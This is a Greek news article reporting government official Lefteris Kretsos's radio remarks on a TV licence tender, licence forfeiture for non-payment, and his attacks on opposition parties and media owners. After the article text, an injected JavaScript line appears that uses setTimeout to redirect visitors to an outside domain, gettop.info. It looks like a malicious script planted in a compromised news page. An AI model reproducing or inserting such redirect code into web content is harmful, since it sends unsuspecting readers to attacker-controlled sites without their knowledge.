Κρέτσος: Σε περίπτωση που δεν καταβληθούν τα χρήματα, η άδεια χάνεται

0
6

 

Ο γενικός γραμματέας ενημέρωσης και επικοινωνίας, Λευτέρης Κρέτσος, μιλώντας στην Πρωινή Ζώνη της ΕΡΤ ξεκαθάρισε ότι σε περίπτωση που δεν καταβληθούν χρήματα, η άδεια χάνεται.

«Η προκήρυξη το λέει ξεκάθαρα για το ποιος παίρνει άδεια», συμπλήρωσε ο κ. Κρέτσος προσθέτοντας ότι «οι αντίπαλες πολιτικές δυνάμεις δεν ήθελαν με τίποτα τη διεξαγωγή του διαγωνισμού, αλλά αυτό ήταν συνταγματική υποχρέωση της κυβέρνησης, αλλιώς θα διέπραττε απιστία εις βάρος του Δημοσίου«.

«Δεν έχω καμία αμφιβολία ότι μέχρι να ολοκληρώσουμε τον διαγωνισμό θα έχουμε συνεχείς ενστάσεις, διαμαρτυρίες και προδικαστικές προσφυγές», απάντησε ο κ. Κρέτσος σε ερώτηση για την πορεία της αδειοδότησης σχετικά με τις διαμαρτυρίες των συμμετεχόντων.

Ο κύριος Κρέτσος με αφορμή τη μηνυτήρια αναφορά εναντίον του έστρεψε τα βέλη του κατά της Νέας Δημοκρατιας, την οποία κατηγόρησε ότι στήριξε το μιντιακό συστημα διαπλοκής χωρίς να τολμήσει να κάνει κανένα διαγωνισμό, ωστόσο, συμπλήρωσε ότι καταλαβαίνει τη μεθόδευση μιας «άσκησης τρομοκρατίας με διασπορά συγκεκριμένων διαρροών».

«Οι κύριοι Κοντομηνάς και Αλαφούζος βρίσκονται υπό φορολογικό έλεγχο. Ο κύριος Ψυχάρης δεν έχει ελεγχθεί» είπε ο κύριος Κρέτσος και σημείωσε: «Δεν είδα να ασχοληθεί κανείς με το κούρεμα χρέους 246 εκατ. ευρώ σε εταιρεία του κ. Βαρδινογιάννη».

Επίσης, χαρακτήρισε παρωδία τον διαγωνισμό της DIGEA, και εξήγησε ότι η Επιτροπή εκανε έλεγχο στο πόθεν έσχες εντός του ορίου που όριζε η προκήρυξη. Τέλος σημείωσε ότι η επιτροπή ενστάσεων έχει δύο βδομαδες περιθώριο για να ολοκληρώσει τους ελέγχους.
setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here